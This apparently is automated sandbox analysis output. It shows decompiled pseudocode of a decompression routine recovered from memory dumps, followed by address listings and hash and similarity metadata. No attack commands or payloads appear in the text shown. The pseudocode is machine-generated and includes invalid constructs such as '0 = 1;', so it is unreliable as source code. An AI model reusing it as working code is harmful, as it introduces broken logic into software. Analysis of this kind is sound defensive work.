                                      														}
                                      													}
                                      												}
                                      												__eflags = __eax;
                                      												if(__eax == 0) {
                                      													goto L183;
                                      												} else {
                                      													goto L172;
                                      												}
                                      											}
                                      											L158:
                                      											__eax = __esi[0x26e9];
                                      											__edx =  &(__esi[0x6e8]);
                                      											__eflags = __eax - __edx;
                                      											if(__eax == __edx) {
                                      												goto L163;
                                      											}
                                      											L159:
                                      											__edi = __edx;
                                      											__eflags = __edi - __eax;
                                      											if(__edi >= __eax) {
                                      												__ecx = __ecx - __edi;
                                      												__eflags = __ecx;
                                      												__eax = __ecx;
                                      											} else {
                                      												__eax = __eax - __edi;
                                      												__eax = __eax - 1;
                                      											}
                                      											__eflags = __eax;
                                      											if(__eax != 0) {
                                      												goto L172;
                                      											} else {
                                      												goto L163;
                                      											}
                                      										case 7:
                                      											L173:
                                      											__eflags = __ebx - 7;
                                      											if(__ebx > 7) {
                                      												__ebx = __ebx - 8;
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                      												_t380 = __ebp - 0x38;
                                      												 *_t380 =  *(__ebp - 0x38) - 1;
                                      												__eflags =  *_t380;
                                      											}
                                      											goto L175;
                                      										case 8:
                                      											L4:
                                      											while(_t425 < 3) {
                                      												if( *(_t448 - 0x34) == 0) {
                                      													goto L182;
                                      												} else {
                                      													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                      													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                      													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                      													_t425 = _t425 + 8;
                                      													continue;
                                      												}
                                      											}
                                      											_t425 = _t425 - 3;
                                      											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                      											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                      											asm("sbb ecx, ecx");
                                      											_t408 = _t406 >> 1;
                                      											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                      											if(_t408 == 0) {
                                      												L24:
                                      												 *_t446 = 9;
                                      												_t436 = _t425 & 0x00000007;
                                      												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                      												_t425 = _t425 - _t436;
                                      												goto L180;
                                      											}
                                      											L6:
                                      											_t411 = _t408 - 1;
                                      											if(_t411 == 0) {
                                      												L13:
                                      												__eflags =  *0x42daf0;
                                      												if( *0x42daf0 != 0) {
                                      													L22:
                                      													_t412 =  *0x409364; // 0x9
                                      													_t446[4] = _t412;
                                      													_t413 =  *0x409368; // 0x5
                                      													_t446[4] = _t413;
                                      													_t414 =  *0x42c96c; // 0x0
                                      													_t446[5] = _t414;
                                      													_t415 =  *0x42c968; // 0x0
                                      													_t446[6] = _t415;
                                      													L23:
                                      													 *_t446 =  *_t446 & 0x00000000;
                                      													goto L180;
                                      												} else {
                                      													_t26 = _t448 - 8;
                                      													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                      													__eflags =  *_t26;
                                      													_t416 = 0x42c970;
                                      													goto L15;
                                      													L20:
                                      													 *_t416 = _t438;
                                      													_t416 = _t416 + 4;
                                      													__eflags = _t416 - 0x42cdf0;
                                      													if(_t416 < 0x42cdf0) {
                                      														L15:
                                      														__eflags = _t416 - 0x42cbac;
                                      														_t438 = 8;
                                      														if(_t416 > 0x42cbac) {
                                      															__eflags = _t416 - 0x42cd70;
                                      															if(_t416 >= 0x42cd70) {
                                      																__eflags = _t416 - 0x42cdd0;
                                      																if(_t416 < 0x42cdd0) {
                                      																	_t438 = 7;
                                      																}
                                      															} else {
                                      																_t438 = 9;
                                      															}
                                      														}
                                      														goto L20;
                                      													} else {
                                      														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
                                      														_push(0x1e);
                                      														_pop(_t440);
                                      														_push(5);
                                      														_pop(_t419);
                                      														memset(0x42c970, _t419, _t440 << 2);
                                      														_t450 = _t450 + 0xc;
                                      														_t442 = 0x42c970 + _t440;
                                      														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
                                      														 *0x42daf0 =  *0x42daf0 + 1;
                                      														__eflags =  *0x42daf0;
                                      														goto L22;
                                      													}
                                      												}
                                      											}
                                      											L7:
                                      											_t423 = _t411 - 1;
                                      											if(_t423 == 0) {
                                      												 *_t446 = 0xb;
                                      												goto L180;
                                      											}
                                      											L8:
                                      											if(_t423 != 1) {
                                      												goto L180;
                                      											}
                                      											goto L9;
                                      										case 9:
                                      											while(1) {
                                      												L27:
                                      												__eflags = __ebx - 0x10;
                                      												if(__ebx >= 0x10) {
                                      													break;
                                      												}
                                      												L25:
                                      												__eflags =  *(__ebp - 0x34);
                                      												if( *(__ebp - 0x34) == 0) {
                                      													goto L182;
                                      												}
                                      												L26:
                                      												__eax =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      												__ecx = __ebx;
                                      												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      												__ebx = __ebx + 8;
                                      												__eflags = __ebx;
                                      											}
                                      											L28:
                                      											__eax =  *(__ebp - 0x40);
                                      											__ebx = 0;
                                      											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                      											 *(__ebp - 0x40) = 0;
                                      											__eflags = __eax;
                                      											__esi[1] = __eax;
                                      											if(__eax == 0) {
                                      												goto L53;
                                      											}
                                      											L29:
                                      											_push(0xa);
                                      											_pop(__eax);
                                      											goto L54;
                                      										case 0xa:
                                      											L30:
                                      											__eflags =  *(__ebp - 0x34);
                                      											if( *(__ebp - 0x34) == 0) {
                                      												goto L182;
                                      											}
                                      											L31:
                                      											__eax =  *(__ebp - 0x2c);
                                      											__eflags = __eax;
                                      											if(__eax != 0) {
                                      												L48:
                                      												__eflags = __eax -  *(__ebp - 0x34);
                                      												if(__eax >=  *(__ebp - 0x34)) {
                                      													__eax =  *(__ebp - 0x34);
                                      												}
                                      												__ecx = __esi[1];
                                      												__eflags = __ecx - __eax;
                                      												__edi = __ecx;
                                      												if(__ecx >= __eax) {
                                      													__edi = __eax;
                                      												}
                                      												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                      												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                      												_t80 =  &(__esi[1]);
                                      												 *_t80 = __esi[1] - __edi;
                                      												__eflags =  *_t80;
                                      												if( *_t80 == 0) {
                                      													L53:
                                      													__eax = __esi[0x145];
                                      													L54:
                                      													 *__esi = __eax;
                                      												}
                                      												goto L180;
                                      											}
                                      											L32:
                                      											__ecx = __esi[0x26e8];
                                      											__edx =  *(__ebp - 0x30);
                                      											__eflags = __edx - __ecx;
                                      											if(__edx != __ecx) {
                                      												L38:
                                      												__esi[0x26ea] = __edx;
                                      												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                      												__edx = __esi[0x26ea];
                                      												__ecx = __esi[0x26e9];
                                      												__eflags = __edx - __ecx;
                                      												 *(__ebp - 0x30) = __edx;
                                      												if(__edx >= __ecx) {
                                      													__eax = __esi[0x26e8];
                                      													__eax = __esi[0x26e8] - __edx;
                                      													__eflags = __eax;
                                      												} else {
                                      													__ecx = __ecx - __edx;
                                      													__eax = __ecx - __edx - 1;
                                      												}
                                      												__edi = __esi[0x26e8];
                                      												 *(__ebp - 0x2c) = __eax;
                                      												__eflags = __edx - __edi;
                                      												if(__edx == __edi) {
                                      													__edx =  &(__esi[0x6e8]);
                                      													__eflags = __edx - __ecx;
                                      													if(__eflags != 0) {
                                      														 *(__ebp - 0x30) = __edx;
                                      														if(__eflags >= 0) {
                                      															__edi = __edi - __edx;
                                      															__eflags = __edi;
                                      															__eax = __edi;
                                      														} else {
                                      															__ecx = __ecx - __edx;
                                      															__eax = __ecx;
                                      														}
                                      														 *(__ebp - 0x2c) = __eax;
                                      													}
                                      												}
                                      												__eflags = __eax;
                                      												if(__eax == 0) {
                                      													goto L183;
                                      												} else {
                                      													goto L48;
                                      												}
                                      											}
                                      											L33:
                                      											__eax = __esi[0x26e9];
                                      											__edi =  &(__esi[0x6e8]);
                                      											__eflags = __eax - __edi;
                                      											if(__eax == __edi) {
                                      												goto L38;
                                      											}
                                      											L34:
                                      											__edx = __edi;
                                      											__eflags = __edx - __eax;
                                      											 *(__ebp - 0x30) = __edx;
                                      											if(__edx >= __eax) {
                                      												__ecx = __ecx - __edx;
                                      												__eflags = __ecx;
                                      												__eax = __ecx;
                                      											} else {
                                      												__eax = __eax - __edx;
                                      												__eax = __eax - 1;
                                      											}
                                      											__eflags = __eax;
                                      											 *(__ebp - 0x2c) = __eax;
                                      											if(__eax != 0) {
                                      												goto L48;
                                      											} else {
                                      												goto L38;
                                      											}
                                      										case 0xb:
                                      											goto L56;
                                      										case 0xc:
                                      											L60:
                                      											__esi[1] = __esi[1] >> 0xa;
                                      											__eax = (__esi[1] >> 0xa) + 4;
                                      											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                      												goto L68;
                                      											}
                                      											goto L61;
                                      										case 0xd:
                                      											while(1) {
                                      												L93:
                                      												__eax = __esi[1];
                                      												__ecx = __esi[2];
                                      												__edx = __eax;
                                      												__eax = __eax & 0x0000001f;
                                      												__edx = __edx >> 5;
                                      												__eax = __edx + __eax + 0x102;
                                      												__eflags = __esi[2] - __eax;
                                      												if(__esi[2] >= __eax) {
                                      													break;
                                      												}
                                      												L73:
                                      												__eax = __esi[0x143];
                                      												while(1) {
                                      													L76:
                                      													__eflags = __ebx - __eax;
                                      													if(__ebx >= __eax) {
                                      														break;
                                      													}
                                      													L74:
                                      													__eflags =  *(__ebp - 0x34);
                                      													if( *(__ebp - 0x34) == 0) {
                                      														goto L182;
                                      													}
                                      													L75:
                                      													__ecx =  *(__ebp - 0x38);
                                      													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                      													__ecx = __ebx;
                                      													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      													__ebx = __ebx + 8;
                                      													__eflags = __ebx;
                                      												}
                                      												L77:
                                      												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                      												__eax = __eax &  *(__ebp - 0x40);
                                      												__ecx = __esi[0x144];
                                      												__eax = __esi[0x144] + __eax * 4;
                                      												__edx =  *(__eax + 1) & 0x000000ff;
                                      												__eax =  *(__eax + 2) & 0x0000ffff;
                                      												__eflags = __eax - 0x10;
                                      												 *(__ebp - 0x14) = __eax;
                                      												if(__eax >= 0x10) {
                                      													L79:
                                      													__eflags = __eax - 0x12;
                                      													if(__eax != 0x12) {
                                      														__eax = __eax + 0xfffffff2;
                                      														 *(__ebp - 8) = 3;
                                      													} else {
                                      														_push(7);
                                      														 *(__ebp - 8) = 0xb;
                                      														_pop(__eax);
                                      													}
                                      													while(1) {
                                      														L84:
                                      														__ecx = __eax + __edx;
                                      														__eflags = __ebx - __eax + __edx;
                                      														if(__ebx >= __eax + __edx) {
                                      															break;
                                      														}
                                      														L82:
                                      														__eflags =  *(__ebp - 0x34);
                                      														if( *(__ebp - 0x34) == 0) {
                                      															goto L182;
                                      														}
                                      														L83:
                                      														__ecx =  *(__ebp - 0x38);
                                      														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                      														__ecx = __ebx;
                                      														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      														__ebx = __ebx + 8;
                                      														__eflags = __ebx;
                                      													}
                                      													L85:
                                      													__ecx = __edx;
                                      													__ebx = __ebx - __edx;
                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                      													__edx =  *(__ebp - 8);
                                      													__ebx = __ebx - __eax;
                                      													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                      													__ecx = __eax;
                                      													__eax = __esi[1];
                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      													__ecx = __esi[2];
                                      													__eax = __eax >> 5;
                                      													__edi = __eax >> 0x00000005 & 0x0000001f;
                                      													__eax = __eax & 0x0000001f;
                                      													__eax = __edi + __eax + 0x102;
                                      													__edi = __edx + __ecx;
                                      													__eflags = __edx + __ecx - __eax;
                                      													if(__edx + __ecx > __eax) {
                                      														goto L9;
                                      													}
                                      													L86:
                                      													__eflags =  *(__ebp - 0x14) - 0x10;
                                      													if( *(__ebp - 0x14) != 0x10) {
                                      														L89:
                                      														__edi = 0;
                                      														__eflags = 0;
                                      														L90:
                                      														__eax = __esi + 0xc + __ecx * 4;
                                      														do {
                                      															L91:
                                      															 *__eax = __edi;
                                      															__ecx = __ecx + 1;
                                      															__eax = __eax + 4;
                                      															__edx = __edx - 1;
                                      															__eflags = __edx;
                                      														} while (__edx != 0);
                                      														__esi[2] = __ecx;
                                      														continue;
                                      													}
                                      													L87:
                                      													__eflags = __ecx - 1;
                                      													if(__ecx < 1) {
                                      														goto L9;
                                      													}
                                      													L88:
                                      													__edi =  *(__esi + 8 + __ecx * 4);
                                      													goto L90;
                                      												}
                                      												L78:
                                      												__ecx = __edx;
                                      												__ebx = __ebx - __edx;
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      												__ecx = __esi[2];
                                      												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                      												__esi[2] = __esi[2] + 1;
                                      											}
                                      											L94:
                                      											__eax = __esi[1];
                                      											__esi[0x144] = __esi[0x144] & 0x00000000;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                      											__edi = __eax;
                                      											__eax = __eax >> 5;
                                      											__edi = __edi & 0x0000001f;
                                      											__ecx = 0x101;
                                      											__eax = __eax & 0x0000001f;
                                      											__edi = __edi + 0x101;
                                      											__eax = __eax + 1;
                                      											__edx = __ebp - 0xc;
                                      											 *(__ebp - 0x14) = __eax;
                                      											 &(__esi[0x148]) = __ebp - 4;
                                      											 *(__ebp - 4) = 9;
                                      											__ebp - 0x18 =  &(__esi[3]);
                                      											 *(__ebp - 0x10) = 6;
                                      											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                      											__eflags =  *(__ebp - 4);
                                      											if( *(__ebp - 4) == 0) {
                                      												__eax = __eax | 0xffffffff;
                                      												__eflags = __eax;
                                      											}
                                      											__eflags = __eax;
                                      											if(__eax != 0) {
                                      												goto L9;
                                      											} else {
                                      												L97:
                                      												__ebp - 0xc =  &(__esi[0x148]);
                                      												__ebp - 0x10 = __ebp - 0x1c;
                                      												__eax = __esi + 0xc + __edi * 4;
                                      												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                      												__eflags = __eax;
                                      												if(__eax != 0) {
                                      													goto L9;
                                      												}
                                      												L98:
                                      												__eax =  *(__ebp - 0x10);
                                      												__eflags =  *(__ebp - 0x10);
                                      												if( *(__ebp - 0x10) != 0) {
                                      													L100:
                                      													__cl =  *(__ebp - 4);
                                      													 *__esi =  *__esi & 0x00000000;
                                      													__eflags =  *__esi;
                                      													__esi[4] = __al;
                                      													__eax =  *(__ebp - 0x18);
                                      													__esi[5] =  *(__ebp - 0x18);
                                      													__eax =  *(__ebp - 0x1c);
                                      													__esi[4] = __cl;
                                      													__esi[6] =  *(__ebp - 0x1c);
                                      													goto L101;
                                      												}
                                      												L99:
                                      												__eflags = __edi - 0x101;
                                      												if(__edi > 0x101) {
                                      													goto L9;
                                      												}
                                      												goto L100;
                                      											}
                                      										case 0xe:
                                      											goto L9;
                                      										case 0xf:
                                      											L175:
                                      											__eax =  *(__ebp - 0x30);
                                      											__esi[0x26ea] =  *(__ebp - 0x30);
                                      											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                      											__ecx = __esi[0x26ea];
                                      											__edx = __esi[0x26e9];
                                      											__eflags = __ecx - __edx;
                                      											 *(__ebp - 0x30) = __ecx;
                                      											if(__ecx >= __edx) {
                                      												__eax = __esi[0x26e8];
                                      												__eax = __esi[0x26e8] - __ecx;
                                      												__eflags = __eax;
                                      											} else {
                                      												__edx = __edx - __ecx;
                                      												__eax = __edx - __ecx - 1;
                                      											}
                                      											__eflags = __ecx - __edx;
                                      											 *(__ebp - 0x2c) = __eax;
                                      											if(__ecx != __edx) {
                                      												L183:
                                      												__edi = 0;
                                      												goto L10;
                                      											} else {
                                      												L179:
                                      												__eax = __esi[0x145];
                                      												__eflags = __eax - 8;
                                      												 *__esi = __eax;
                                      												if(__eax != 8) {
                                      													L184:
                                      													0 = 1;
                                      													goto L10;
                                      												}
                                      												goto L180;
                                      											}
                                      									}
                                      								}
                                      								L181:
                                      								goto L9;
                                      							}
                                      							L70:
                                      							if( *__edi == __eax) {
                                      								goto L72;
                                      							}
                                      							L71:
                                      							__esi[2] = __esi[2] & __eax;
                                      							 *__esi = 0xd;
                                      							goto L93;
                                      						}
                                      					}
                                      				}
                                      				L182:
                                      				_t443 = 0;
                                      				_t446[0x147] =  *(_t448 - 0x40);
                                      				_t446[0x146] = _t425;
                                      				( *(_t448 + 8))[1] = 0;
                                      				goto L11;
                                      			}









                                      0x00406002
                                      0x00406005
                                      0x00406007
                                      0x00406007
                                      0x0040600a
                                      0x0040600d
                                      0x0040600f
                                      0x00406011
                                      0x00406013
                                      0x00406013
                                      0x0040601c
                                      0x00406021
                                      0x00406024
                                      0x00406027
                                      0x0040602a
                                      0x0040602d
                                      0x0040602d
                                      0x0040602d
                                      0x00406030
                                      0x00406036
                                      0x00406036
                                      0x0040603c
                                      0x0040603c
                                      0x0040603c
                                      0x00000000
                                      0x00406030
                                      0x00405f6a
                                      0x00405f6a
                                      0x00405f70
                                      0x00405f73
                                      0x00405f75
                                      0x00405fa0
                                      0x00405fa3
                                      0x00405fa9
                                      0x00405fae
                                      0x00405fb4
                                      0x00405fba
                                      0x00405fbc
                                      0x00405fbf
                                      0x00405fc8
                                      0x00405fce
                                      0x00405fce
                                      0x00405fc1
                                      0x00405fc3
                                      0x00405fc5
                                      0x00405fc5
                                      0x00405fd0
                                      0x00405fd6
                                      0x00405fd9
                                      0x00405fdb
                                      0x00405fdd
                                      0x00405fe3
                                      0x00405fe5
                                      0x00405fe7
                                      0x00405fea
                                      0x00405ff3
                                      0x00405ff3
                                      0x00405ff5
                                      0x00405fec
                                      0x00405fec
                                      0x00405fef
                                      0x00405fef
                                      0x00405ff7
                                      0x00405ff7
                                      0x00405fe5
                                      0x00405ffa
                                      0x00405ffc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405ffc
                                      0x00405f77
                                      0x00405f77
                                      0x00405f7d
                                      0x00405f83
                                      0x00405f85
                                      0x00000000
                                      0x00000000
                                      0x00405f87
                                      0x00405f87
                                      0x00405f89
                                      0x00405f8b
                                      0x00405f8e
                                      0x00405f95
                                      0x00405f95
                                      0x00405f97
                                      0x00405f90
                                      0x00405f90
                                      0x00405f92
                                      0x00405f92
                                      0x00405f99
                                      0x00405f9b
                                      0x00405f9e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004060a2
                                      0x004060a5
                                      0x004060a8
                                      0x004060ae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406285
                                      0x00406285
                                      0x00406285
                                      0x00406288
                                      0x0040628b
                                      0x0040628d
                                      0x00406290
                                      0x00406296
                                      0x0040629d
                                      0x0040629f
                                      0x00000000
                                      0x00000000
                                      0x00406173
                                      0x00406173
                                      0x0040619b
                                      0x0040619b
                                      0x0040619b
                                      0x0040619d
                                      0x00000000
                                      0x00000000
                                      0x0040617b
                                      0x0040617b
                                      0x0040617f
                                      0x00000000
                                      0x00000000
                                      0x00406185
                                      0x00406185
                                      0x00406188
                                      0x0040618b
                                      0x0040618e
                                      0x00406190
                                      0x00406192
                                      0x00406195
                                      0x00406198
                                      0x00406198
                                      0x00406198
                                      0x0040619f
                                      0x0040619f
                                      0x004061a7
                                      0x004061aa
                                      0x004061b0
                                      0x004061b3
                                      0x004061b7
                                      0x004061bb
                                      0x004061be
                                      0x004061c1
                                      0x004061d9
                                      0x004061d9
                                      0x004061dc
                                      0x004061ea
                                      0x004061ed
                                      0x004061de
                                      0x004061de
                                      0x004061e0
                                      0x004061e7
                                      0x004061e7
                                      0x00406216
                                      0x00406216
                                      0x00406216
                                      0x00406219
                                      0x0040621b
                                      0x00000000
                                      0x00000000
                                      0x004061f6
                                      0x004061f6
                                      0x004061fa
                                      0x00000000
                                      0x00000000
                                      0x00406200
                                      0x00406200
                                      0x00406203
                                      0x00406206
                                      0x00406209
                                      0x0040620b
                                      0x0040620d
                                      0x00406210
                                      0x00406213
                                      0x00406213
                                      0x00406213
                                      0x0040621d
                                      0x0040621d
                                      0x0040621f
                                      0x00406221
                                      0x0040622c
                                      0x0040622f
                                      0x00406232
                                      0x00406234
                                      0x00406236
                                      0x00406238
                                      0x0040623b
                                      0x0040623e
                                      0x00406243
                                      0x00406246
                                      0x00406249
                                      0x0040624c
                                      0x00406253
                                      0x00406256
                                      0x00406258
                                      0x00000000
                                      0x00000000
                                      0x0040625e
                                      0x0040625e
                                      0x00406262
                                      0x00406273
                                      0x00406273
                                      0x00406273
                                      0x00406275
                                      0x00406275
                                      0x00406279
                                      0x00406279
                                      0x00406279
                                      0x0040627b
                                      0x0040627c
                                      0x0040627f
                                      0x0040627f
                                      0x0040627f
                                      0x00406282
                                      0x00000000
                                      0x00406282
                                      0x00406264
                                      0x00406264
                                      0x00406267
                                      0x00000000
                                      0x00000000
                                      0x0040626d
                                      0x0040626d
                                      0x00000000
                                      0x0040626d
                                      0x004061c3
                                      0x004061c3
                                      0x004061c5
                                      0x004061c7
                                      0x004061ca
                                      0x004061cd
                                      0x004061d1
                                      0x004061d1
                                      0x004062a5
                                      0x004062a5
                                      0x004062a8
                                      0x004062af
                                      0x004062b3
                                      0x004062b5
                                      0x004062b8
                                      0x004062bb
                                      0x004062c0
                                      0x004062c3
                                      0x004062c5
                                      0x004062c6
                                      0x004062c9
                                      0x004062d4
                                      0x004062d7
                                      0x004062ee
                                      0x004062f3
                                      0x004062fa
                                      0x004062ff
                                      0x00406303
                                      0x00406305
                                      0x00406305
                                      0x00406305
                                      0x00406308
                                      0x0040630a
                                      0x00000000
                                      0x00406310
                                      0x00406310
                                      0x00406314
                                      0x0040631f
                                      0x00406332
                                      0x00406337
                                      0x0040633c
                                      0x0040633e
                                      0x00000000
                                      0x00000000
                                      0x00406344
                                      0x00406344
                                      0x00406347
                                      0x00406349
                                      0x00406357
                                      0x00406357
                                      0x0040635a
                                      0x0040635a
                                      0x0040635d
                                      0x00406360
                                      0x00406363
                                      0x00406366
                                      0x00406369
                                      0x0040636c
                                      0x00000000
                                      0x0040636c
                                      0x0040634b
                                      0x0040634b
                                      0x00406351
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406351
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004066f0
                                      0x004066f0
                                      0x004066f6
                                      0x004066fc
                                      0x00406701
                                      0x00406707
                                      0x0040670d
                                      0x0040670f
                                      0x00406712
                                      0x0040671b
                                      0x00406721
                                      0x00406721
                                      0x00406714
                                      0x00406716
                                      0x00406718
                                      0x00406718
                                      0x00406723
                                      0x00406725
                                      0x00406728
                                      0x00406763
                                      0x00406763
                                      0x00000000
                                      0x0040672a
                                      0x0040672a
                                      0x0040672a
                                      0x00406730
                                      0x00406733
                                      0x00406735
                                      0x0040676a
                                      0x0040676c
                                      0x00000000
                                      0x0040676c
                                      0x00000000
                                      0x00406735
                                      0x00000000
                                      0x00405d74
                                      0x00406742
                                      0x00000000
                                      0x00406742
                                      0x00406156
                                      0x00406158
                                      0x00000000
                                      0x00000000
                                      0x0040615a
                                      0x0040615a
                                      0x0040615d
                                      0x00000000
                                      0x0040615d
                                      0x004060a2
                                      0x00406063
                                      0x00406747
                                      0x0040674a
                                      0x0040674c
                                      0x00406755
                                      0x0040675b
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                      • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                      • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                      • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction ID: 796fb68eb1f87bea3f80c9806ef9223dd5081e047b6a400757c7a0e3bae678b6
                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction Fuzzy Hash: 56C170322095D309FB5DC639847403EBAE2AB927F131B476DD4B6DB1D9EF20D924D620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: f57480ff781f2d253870521aa09b6984686a72b1ec4a2fd938c366b5bb3ccbe4
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 3EC172336095D309EB4DC639843413EBAE2AB917F1317476DD4BAEB1D9EF20CD249620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                      				signed int _v8;
                                      				unsigned int _v12;
                                      				signed int _v16;
                                      				intOrPtr _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				intOrPtr* _v32;
                                      				signed int* _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				void _v116;
                                      				signed int _v176;
                                      				signed int _v180;
                                      				signed int _v240;
